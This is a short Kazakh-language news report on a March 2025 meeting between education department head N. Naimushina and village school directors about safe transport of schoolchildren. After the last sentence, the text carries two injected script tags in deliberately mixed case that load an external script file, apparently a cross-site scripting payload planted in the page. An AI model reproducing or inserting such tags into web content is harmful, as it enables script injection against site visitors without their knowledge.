2025 жылдың 12 наурызында білім бөлімінің басшысы Н. Наймушинаның Тимашевка, Тельман, Ақан Құрманов, Шуйское, Полтавка ауылдарының жалпы білім беретін мектептерінің директорларымен жұмыс кеңесі өтті, онда балаларды тасымалдауға байланысты мәселелер талқыланды. Білім беру ұйымдары үшін балаларды тасымалдау алгоритмі, іс-шаралар жоспары, құжаттаманы дұрыс жүргізу қарастырылды. Тасымалдау кезінде балалардың қауіпсіздігіне ерекше назар аударылды. Кездесу қорытындысы бойынша бақылауды күшейтуге және жүргізушілердің жауапкершілігін арттыруға бағытталған шешімдер қабылданды. Сенімді және қауіпсіз тасымалдауды қамтамасыз ету үшін келесі қадамдар жоспарланған.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>